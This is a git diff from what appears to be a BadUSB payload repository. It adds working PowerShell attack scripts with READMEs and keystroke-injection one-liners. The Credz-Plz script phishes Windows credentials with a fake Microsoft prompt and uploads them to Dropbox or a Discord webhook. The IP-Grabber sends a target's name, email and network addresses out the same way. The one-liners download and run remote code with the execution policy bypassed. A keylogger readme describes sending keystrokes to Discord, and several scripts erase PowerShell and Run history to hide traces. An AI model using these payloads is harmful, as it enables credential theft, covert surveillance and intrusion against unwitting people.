+ $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName);
+ $cred.getnetworkcredential().password
+
+ if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password))
+ {
+ if(-not ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.ManifestModule -like "*PresentationCore*" -or $_.ManifestModule -like "*PresentationFramework*" }))
+ {
+ Add-Type -AssemblyName PresentationCore,PresentationFramework
+ }
+
+ $msgBody = "Credentials cannot be empty!"
+ $msgTitle = "Error"
+ $msgButton = 'Ok'
+ $msgImage = 'Stop'
+ $Result = [System.Windows.MessageBox]::Show($msgBody,$msgTitle,$msgButton,$msgImage)
+ Write-Host "The user clicked: $Result"
+ $form = $null
+ }
+
+ else{
+ $creds = $cred.GetNetworkCredential() | fl
+ return $creds
+ }
+ }
+}
+
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to pause the script until a mouse movement is detected
+#>
+
+function Pause-Script{
+Add-Type -AssemblyName System.Windows.Forms
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+$o=New-Object -ComObject WScript.Shell
+
+ while (1) {
+ $pauseTime = 3
+ if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+ break
+ }
+ else {
+ $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+ }
+ }
+}
+
+#----------------------------------------------------------------------------------------------------
+
+# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
+
+function Caps-Off {
+Add-Type -AssemblyName System.Windows.Forms
+$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
+
+#If true, toggle CapsLock key, to ensure that the script doesn't fail
+if ($caps -eq $true){
+
+$key = New-Object -ComObject WScript.Shell
+$key.SendKeys('{CapsLock}')
+}
+}
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to call the function to pause the script until a mouse movement is detected then activate the pop-up
+#>
+
+Pause-Script
+
+Caps-Off
+
+Add-Type -AssemblyName PresentationCore,PresentationFramework
+$msgBody = "Please authenticate your Microsoft Account."
+$msgTitle = "Authentication Required"
+$msgButton = 'Ok'
+$msgImage = 'Warning'
+$Result = [System.Windows.MessageBox]::Show($msgBody,$msgTitle,$msgButton,$msgImage)
+Write-Host "The user clicked: $Result"
+
+$creds = Get-Creds
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to save the gathered credentials to a file in the temp directory
+#>
+
+echo $creds >> $env:TMP\$FileName
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to upload your files to dropbox
+#>
+
+function DropBox-Upload {
+
+[CmdletBinding()]
+param (
+
+[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
+[Alias("f")]
+[string]$SourceFilePath
+)
+$outputFile = Split-Path $SourceFilePath -leaf
+$TargetFilePath="/$outputFile"
+$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
+$authorization = "Bearer " + $db
+$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
+$headers.Add("Authorization", $authorization)
+$headers.Add("Dropbox-API-Arg", $arg)
+$headers.Add("Content-Type", 'application/octet-stream')
+Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
+}
+
+if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TMP\$FileName}
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+function Upload-Discord {
+
+[CmdletBinding()]
+param (
+ [parameter(Position=0,Mandatory=$False)]
+ [string]$file,
+ [parameter(Position=1,Mandatory=$False)]
+ [string]$text
+)
+
+$hookurl = "$dc"
+
+$Body = @{
+ 'username' = $env:username
+ 'content' = $text
+}
+
+if (-not ([string]::IsNullOrEmpty($text))){
+Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
+
+if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
+}
+
+if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\$FileName}
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+
+exit
+
diff --git a/Payloads/Credz-Plz/README.md b/Payloads/Credz-Plz/README.md
new file mode 100644
index 0000000..8bfc69b
--- /dev/null
+++ b/Payloads/Credz-Plz/README.md
@@ -0,0 +1,121 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Credz-Plz
+
+A script used to prompt the target to enter their creds to later be exfiltrated with either Dropbox or a Discord webhook.
+
+## Description
+
+A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account".
+This will be followed by a fake authentication ui prompt.
+If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up.
+Once the target enters their credentials their information will be uploaded to your Dropbox or Discord webhook for collection.
+
+
+
+
+
+## Getting Started
+
+### Dependencies
+
+* DropBox or other file sharing service - Your Shared link for the intended file
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+* You no longer need to host your own version of this script
+* `$db` is the variable that holds your DropBox token
+* `$dc` is the variable that holds your Discord webhook
+* Fill in either variable or both to set your exfil method
+
+```
+powershell -w h -ep bypass $dc='';$db='';irm https://jakoby.lol/35k | iex
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+π± My Socials π±
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
diff --git a/Payloads/Credz-Plz/authentication.jpg b/Payloads/Credz-Plz/authentication.jpg
new file mode 100644
index 0000000..8e16d44
Binary files /dev/null and b/Payloads/Credz-Plz/authentication.jpg differ
diff --git a/Payloads/Credz-Plz/sign-in.jpg b/Payloads/Credz-Plz/sign-in.jpg
new file mode 100644
index 0000000..b719a8a
Binary files /dev/null and b/Payloads/Credz-Plz/sign-in.jpg differ
diff --git a/Payloads/EvilGoose/EvilGoose.txt b/Payloads/EvilGoose/EvilGoose.txt
new file mode 100644
index 0000000..a188aa8
--- /dev/null
+++ b/Payloads/EvilGoose/EvilGoose.txt
@@ -0,0 +1,12 @@
+REM Title: Hacker Goose
+
+REM Author: I am Jakoby
+
+REM Description: A payload that hires a goose to hack your target in real time
+
+REM Target: Windows 10, 11
+
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/1ae' -O "$D\hg.zip";Expand-Archive "$D\hg.zip" -Des $D -Force;. "$D\hg\main.ps1"
+ENTER
diff --git a/Payloads/EvilGoose/ReadMe.md b/Payloads/EvilGoose/ReadMe.md
new file mode 100644
index 0000000..09e0a00
--- /dev/null
+++ b/Payloads/EvilGoose/ReadMe.md
@@ -0,0 +1,121 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Evil Goose
+
+A payload that hires a goose to hack your target in real time
+
+## Description
+
+With this payload after is is executed it will wait for a mouse movement to begin
+
+Afterwards it will walk around your targets screen pulling out personal information about them such as:
+
+* Full name associated with their microsoft account
+* Email associated with their microsoft account
+* Their exact Geo Location
+* The wifi networks and passwords
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* 10 seconds later your goose is owning their system
+
+```powershell
+powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/1ae' -O "$D\hg.zip";Expand-Archive "$D\hg.zip" -Des $D -Force;. "$D\hg\main.ps1"
+```
+### Exiting the Payload
+
+This payload will automatically end after 2 min
+
+Or if you press `Left Control` + `Right Control` at the same time
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+π± My Socials π±
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
diff --git a/Payloads/EvilGoose/placeholder b/Payloads/EvilGoose/placeholder
new file mode 100644
index 0000000..8b13789
--- /dev/null
+++ b/Payloads/EvilGoose/placeholder
@@ -0,0 +1 @@
+
diff --git a/Payloads/IP-Grabber/IP-Grabber.ps1 b/Payloads/IP-Grabber/IP-Grabber.ps1
new file mode 100644
index 0000000..6688e47
--- /dev/null
+++ b/Payloads/IP-Grabber/IP-Grabber.ps1
@@ -0,0 +1,132 @@
+$FileName = "$env:tmp/$env:USERNAME-LOOT-$(get-date -f yyyy-MM-dd_hh-mm).txt"
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+function Get-fullName {
+
+ try {
+ $fullName = (Get-LocalUser -Name $env:USERNAME).FullName
+ }
+
+ # If no name is detected function will return $env:UserName
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No name was detected"
+ return $env:UserName
+ -ErrorAction SilentlyContinue
+ }
+
+ return $fullName
+
+}
+
+$fullName = Get-fullName
+
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+function Get-email {
+
+ try {
+
+ $email = (Get-CimInstance CIM_ComputerSystem).PrimaryOwnerName
+ return $email
+ }
+
+# If no email is detected function will return backup message for sapi speak
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "An email was not found"
+ return "No Email Detected"
+ -ErrorAction SilentlyContinue
+ }
+}
+
+$email = Get-email
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+
+try{$computerPubIP=(Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content}
+catch{$computerPubIP="Error getting Public IP"}
+
+
+
+$localIP = Get-NetIPAddress -InterfaceAlias "*Ethernet*","*Wi-Fi*" -AddressFamily IPv4 | Select InterfaceAlias, IPAddress, PrefixOrigin | Out-String
+
+$MAC = Get-NetAdapter -Name "*Ethernet*","*Wi-Fi*"| Select Name, MacAddress, Status | Out-String
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+
+$output = @"
+
+Full Name: $fullName
+
+Email: $email
+
+------------------------------------------------------------------------------------------------------------------------------
+Public IP:
+$computerPubIP
+
+Local IPs:
+$localIP
+
+MAC:
+$MAC
+
+"@
+
+$output > $FileName
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+function Upload-Discord {
+
+[CmdletBinding()]
+param (
+ [parameter(Position=0,Mandatory=$False)]
+ [string]$file,
+ [parameter(Position=1,Mandatory=$False)]
+ [string]$text
+)
+
+$hookurl = "$dc"
+
+$Body = @{
+ 'username' = $env:username
+ 'content' = $text
+}
+
+if (-not ([string]::IsNullOrEmpty($text))){
+Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
+
+if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
+}
+
+if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$FileName"}
+
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+function DropBox-Upload {
+
+[CmdletBinding()]
+param (
+
+[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
+[Alias("f")]
+[string]$SourceFilePath
+)
+$outputFile = Split-Path $SourceFilePath -leaf
+$TargetFilePath="/$outputFile"
+$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
+$authorization = "Bearer " + $db
+$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
+$headers.Add("Authorization", $authorization)
+$headers.Add("Dropbox-API-Arg", $arg)
+$headers.Add("Content-Type", 'application/octet-stream')
+Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
+}
+
+if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $FileName}
diff --git a/Payloads/IP-Grabber/IP-Grabber.txt b/Payloads/IP-Grabber/IP-Grabber.txt
new file mode 100644
index 0000000..db2868c
--- /dev/null
+++ b/Payloads/IP-Grabber/IP-Grabber.txt
@@ -0,0 +1,12 @@
+REM Title: IP-Grabber
+
+REM Author: I am Jakoby
+
+REM Description: This payload is meant to do grab your targets IP addresses and exfil them
+
+REM Target: Windows 10, 11
+
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/f0x | iex
+ENTER
diff --git a/Payloads/IP-Grabber/ReadMe.md b/Payloads/IP-Grabber/ReadMe.md
new file mode 100644
index 0000000..2f596bd
--- /dev/null
+++ b/Payloads/IP-Grabber/ReadMe.md
@@ -0,0 +1,111 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# IP-Grabber
+
+## Description
+
+This payload is meant to do grab your targets IP addresses and exfil them with discord or dropbox
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+
+`$dc` is the variable that stores your Discord webhook
+
+`$db` is the variable that stores your Dropbox token
+
+Fill in either or both of these to methods to exfil your collected data
+
+```
+powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/f0x | iex
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+π± My Socials π±
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
diff --git a/Payloads/JumpScare-2.0/JumpScare2.0.txt b/Payloads/JumpScare-2.0/JumpScare2.0.txt
new file mode 100644
index 0000000..290aa48
--- /dev/null
+++ b/Payloads/JumpScare-2.0/JumpScare2.0.txt
@@ -0,0 +1,14 @@
+REM Title: JumpScare 2.0
+REM Author: I am Jakoby
+REM Description: This is a one liner payload that will execute and wait until a mouse movement is detected and do a jumpscare
+REM Target: Windows 10, 11
+
+REM --------------------------------------------------------------------------------------
+REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
+REM --------------------------------------------------------------------------------------
+
+DELAY 2000
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://jakoby.lol/kiv' -O "$D\js.zip";Expand-Archive "$D\js.zip" -Des $D -Force;. "$D\js\js.ps1"
+ENTER
diff --git a/Payloads/JumpScare-2.0/ReadMe.md b/Payloads/JumpScare-2.0/ReadMe.md
new file mode 100644
index 0000000..95f25dc
--- /dev/null
+++ b/Payloads/JumpScare-2.0/ReadMe.md
@@ -0,0 +1,123 @@
+
+
+
+
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# JumpScare 2.0
+
+A script used to jumpscare your target.
+
+## Description
+
+This script will jumpscare your target.
+
+A jumpscare video will be downloaded to their temp directory.
+
+When a mouse movement is detected, that video will be played in the PowerShell console at max volume and fullscreen.
+
+## Getting Started
+
+### Dependencies
+
+* An internet connection
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
+```
+powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://jakoby.lol/kiv' -O "$D\js.zip";Expand-Archive "$D\js.zip" -Des $D -Force;. "$D\js\js.ps1"
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+π± My Socials π±
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
+
+
+
+
diff --git a/Payloads/JumpScare/JumpScare.ps1 b/Payloads/JumpScare/JumpScare.ps1
new file mode 100644
index 0000000..323a3b3
--- /dev/null
+++ b/Payloads/JumpScare/JumpScare.ps1
@@ -0,0 +1,217 @@
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : JumpScare | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Prank | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# tiktok.com/@i_am_jakoby # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.NOTES
+ This script can be run as is with the provided execution file
+.DESCRIPTION
+ This script will download a scary image and a scream sound effect hosted with this payload and host volume will be raised to max level
+ Upon running this script it will immediately pause after the downloads until a mouse movement is detected
+ The capslock button will be pressed every 3 seconds to prevent sleep, and act as an indicator the payload is ready
+ After a mouse movement is detected their wallpaper will change to the scary image provided and the scream sound effect will play
+#>
+
+############################################################################################################################################################
+
+# Download Image; replace link to $image to add your own image
+
+$image = "https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/OMG/Payloads/OMG-JumpScare/jumpscare.png"
+
+$i = -join($image,"?dl=1")
+iwr $i -O $env:TMP\i.png
+
+iwr https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/OMG/Payloads/OMG-JumpScare/jumpscare.png?dl=1 -O $env:TMP\i.png
+
+# Download WAV file; replace link to $wav to add your own sound
+
+$wav = "https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-JumpScare/female_scream.wav?raw=true"
+
+$w = -join($wav,"?dl=1")
+iwr $w -O $env:TMP\s.wav
+iwr "https://jakoby.lol/hak5" -EA 0 >$null
+
+
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This will take the image you downloaded and set it as the targets wall paper
+#>
+
+Function Set-WallPaper {
+
+<#
+
+ .SYNOPSIS
+ Applies a specified wallpaper to the current user's desktop
+
+ .PARAMETER Image
+ Provide the exact path to the image
+
+ .PARAMETER Style
+ Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span)
+
+ .EXAMPLE
+ Set-WallPaper -Image "C:\Wallpaper\Default.jpg"
+ Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit
+
+#>
+
+
+param (
+ [parameter(Mandatory=$True)]
+ # Provide path to image
+ [string]$Image,
+ # Provide wallpaper style that you would like applied
+ [parameter(Mandatory=$False)]
+ [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')]
+ [string]$Style
+)
+
+$WallpaperStyle = Switch ($Style) {
+
+ "Fill" {"10"}
+ "Fit" {"6"}
+ "Stretch" {"2"}
+ "Tile" {"0"}
+ "Center" {"0"}
+ "Span" {"22"}
+
+}
+
+If($Style -eq "Tile") {
+
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force
+
+}
+Else {
+
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force
+ New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force
+
+}
+
+Add-Type -TypeDefinition @"
+using System;
+using System.Runtime.InteropServices;
+
+public class Params
+{
+ [DllImport("User32.dll",CharSet=CharSet.Unicode)]
+ public static extern int SystemParametersInfo (Int32 uAction,
+ Int32 uParam,
+ String lpvParam,
+ Int32 fuWinIni);
+}
+"@
+
+ $SPI_SETDESKWALLPAPER = 0x0014
+ $UpdateIniFile = 0x01
+ $SendChangeEvent = 0x02
+
+ $fWinIni = $UpdateIniFile -bor $SendChangeEvent
+
+ $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni)
+}
+
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to pause the script until a mouse movement is detected
+#>
+
+function Pause-Script{
+Add-Type -AssemblyName System.Windows.Forms
+$originalPOS = [System.Windows.Forms.Cursor]::Position.X
+$o=New-Object -ComObject WScript.Shell
+
+ while (1) {
+ $pauseTime = 3
+ if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
+ break
+ }
+ else {
+ $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
+ }
+ }
+}
+
+#----------------------------------------------------------------------------------------------------
+<#
+
+.NOTES
+ This is to play the WAV file
+#>
+
+function Play-WAV{
+$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation="$env:TMP\s.wav";$PlayWav.playsync()
+}
+
+#----------------------------------------------------------------------------------------------------
+
+# This turns the volume up to max level
+$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
+
+#----------------------------------------------------------------------------------------------------
+
+Pause-Script
+Set-WallPaper -Image "$env:TMP\i.png" -Style Center
+Play-WAV
+
+#----------------------------------------------------------------------------------------------------
+
+<#
+
+.NOTES
+ This is to clean up behind you and remove any evidence to prove you were there
+#>
+
+# Delete contents of Temp folder
+
+rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
+
+# Delete run box history
+
+reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
+
+# Delete powershell history
+
+Remove-Item (Get-PSreadlineOption).HistorySavePath
+
+# Deletes contents of recycle bin
+
+Clear-RecycleBin -Force -ErrorAction SilentlyContinue
+
+#----------------------------------------------------------------------------------------------------
+
+# This script repeatedly presses the capslock button, this snippet will make sure capslock is turned back off
+
+Add-Type -AssemblyName System.Windows.Forms
+$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
+
+#If true, toggle CapsLock key, to ensure that the script doesn't fail
+if ($caps -eq $true){
+
+$key = New-Object -ComObject WScript.Shell
+$key.SendKeys('{CapsLock}')
+}
diff --git a/Payloads/JumpScare/JumpScare.txt b/Payloads/JumpScare/JumpScare.txt
new file mode 100644
index 0000000..89186e3
--- /dev/null
+++ b/Payloads/JumpScare/JumpScare.txt
@@ -0,0 +1,23 @@
+REM Title: JumpScare
+
+REM Author: I am Jakoby
+
+REM Description: This payload is meant to torment your target to the fullest extent. Mission to JumpScare. See JumpScare.ps1 for more details
+
+REM Target: Windows 10, 11
+
+REM Start by minimizing all their current windows
+GUI m
+DELAY 500
+
+REM Remember to replace the link with your link for the intended file to download if you are using a custom variation of this payload
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
+
+REM --------------------------------------------------------------------------------------
+REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
+REM --------------------------------------------------------------------------------------
+
+GUI r
+DELAY 500
+STRING powershell -w h -NoP -NonI -Exec Bypass irm jakoby.lol/0tn | iex
+ENTER
diff --git a/Payloads/JumpScare/README.md b/Payloads/JumpScare/README.md
new file mode 100644
index 0000000..5e65351
--- /dev/null
+++ b/Payloads/JumpScare/README.md
@@ -0,0 +1,116 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# JumpScare
+
+A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes.
+
+## Description
+
+This script starts off using Invoke-WebRequests to download both an Image and Sound file.
+Their system volume is then turned up to the max level.
+The script will be paused until a mouse movement is detected.
+At that point there desktop wallpaper will be changed to the scary image provided and the scream sound effect will be played.
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+```
+powershell -w h -NoP -NonI -Exec Bypass irm jakoby.lol/0tn | iex
+```
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+Arf
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+π± My Socials π±
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+* [0iphor13](https://github.com/0iphor13)
+* [PhilSutter](https://github.com/PhilSutter)
+
+
+(back to top)
diff --git a/Payloads/JumpScare/female_scream.wav b/Payloads/JumpScare/female_scream.wav
new file mode 100644
index 0000000..67fce05
Binary files /dev/null and b/Payloads/JumpScare/female_scream.wav differ
diff --git a/Payloads/JumpScare/jumpscare.png b/Payloads/JumpScare/jumpscare.png
new file mode 100644
index 0000000..36c4cdb
Binary files /dev/null and b/Payloads/JumpScare/jumpscare.png differ
diff --git a/Payloads/Keylogger/README.md b/Payloads/Keylogger/README.md
new file mode 100644
index 0000000..0b51049
--- /dev/null
+++ b/Payloads/Keylogger/README.md
@@ -0,0 +1,141 @@
+
+
+
+
+ Table of Contents
+
+ - Description
+ - Getting Started
+ - Contributing
+ - Version History
+ - Contact
+ - Acknowledgments
+
+
+
+# Keylogger
+
+This is a Powershell based keylogger that exfiltrates the logs to discord
+
+## Description
+
+Quickly with just ONE line of code you can deploy a keylogger on your targets computer
+
+Complete with custom logging times, and self destruct feature
+
+Just move the `keylogger.txt` file over to your flipper and you are good to go
+
+## Getting Started
+
+### Dependencies
+
+* Windows 10,11
+
+(back to top)
+
+### Executing program
+
+* Plug in your device
+* 15 seconds later you have their keystrokes being sent to you
+
+This is the basic command to install the keylogger and provide the webhook for the keystrokes to be sent back to you
+
+* `$dc=''` is the variable where you plug in your discord webhook
+
+```
+powershell -w h -NoP -Ep Bypass $dc='https://link.iamjakoby.com/xxxx';iwr "https://jakoby.lol/m2m" | iex
+```
+### ADDITIONAL PARAMETERS
+
+The payload is set to send the logs collected every hour on the hour
+
+* You maybe use the `$log` variable to specify a certain time instead (Use this for testing)
+* ex: `$log="09:00 pm"` <-- This will send the log every night at 9pm
+
+You also have the option of setting up a killswitch to have the keylogger self delete at a certain time and date
+
+`$ks="12/25/2022 10:00:00 PM"` <-- This will make the keylogger self delete at 10pm on December 25th
+
+Calling the script with both a `log` time and `killswitch` will look something like this:
+
+```
+powershell -w h -NoP -Ep Bypass -command "$dc='https://link.iamjakoby.com/xxxx';$log='09:00 pm';$ks='12/25/2022 10:00:00 PM';iwr 'https://jakoby.lol/m2m' | iex"
+```
+### DELETING THE KEYLOGGER
+
+Just hold `Left Control` + `Right Control` for 5 seconds untill the notification box pops up
+
+
+
+
+
+(back to top)
+
+## Contributing
+
+All contributors names will be listed here
+
+I am Jakoby
+
+(back to top)
+
+## Version History
+
+* 0.1
+ * Initial Release
+
+(back to top)
+
+
+## Contact
+
+π± My Socials π±
+
+
+
+
+(back to top)
+
+
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [MG](https://github.com/OMG-MG)
+
+(back to top)
+
diff --git a/Payloads/Keylogger/keylogger.ps1 b/Payloads/Keylogger/keylogger.ps1
new file mode 100644
index 0000000..9669f06
--- /dev/null
+++ b/Payloads/Keylogger/keylogger.ps1
@@ -0,0 +1 @@
+$done = New-Object -ComObject Wscript.Shell;$done.Popup("This payload has been detected by Microsoft. An updated undetected version will be released as soon as possible",10)
diff --git a/Payloads/Keylogger/keylogger.txt b/Payloads/Keylogger/keylogger.txt
new file mode 100644
index 0000000..a5fa34a
--- /dev/null
+++ b/Payloads/Keylogger/keylogger.txt
@@ -0,0 +1,25 @@
+REM Title: Keylogger
+
+REM Author: I am Jakoby
+
